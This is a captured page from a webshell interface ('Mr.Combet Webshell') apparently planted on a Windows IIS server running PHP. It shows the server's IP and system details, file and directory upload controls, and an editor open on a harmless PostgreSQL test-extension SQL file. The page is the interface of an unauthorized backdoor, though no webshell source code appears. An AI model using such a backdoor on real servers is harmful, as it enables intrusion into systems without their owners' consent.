Mr.Combet Webshell
Your IP :
216.73.216.136
Server IP :
103.233.58.157
Server :
Windows NT WIN-4PGF72KEHKB 10.0 build 17763 (Windows Server 2016) AMD64
Server Software :
Microsoft-IIS/10.0
PHP Version :
7.3.25
Add File :
Submit
Add Directory :
Submit
Dir :
C:
/
Program Files
/
PostgreSQL
/
14
/
share
/
extension
/
Edit File Name :
test_ext7--1.0.sql
/* src/test/modules/test_extensions/test_ext7--1.0.sql */ -- complain if script is sourced in psql, rather than via CREATE EXTENSION \echo Use "CREATE EXTENSION test_ext7" to load this file. \quit -- link some existing serial-owning table to the extension alter extension test_ext7 add table old_table1; alter extension test_ext7 add sequence old_table1_col1_seq; -- ordinary member tables with serial columns create table ext7_table1 (col1 serial primary key); create table ext7_table2 (col2 serial primary key);
Save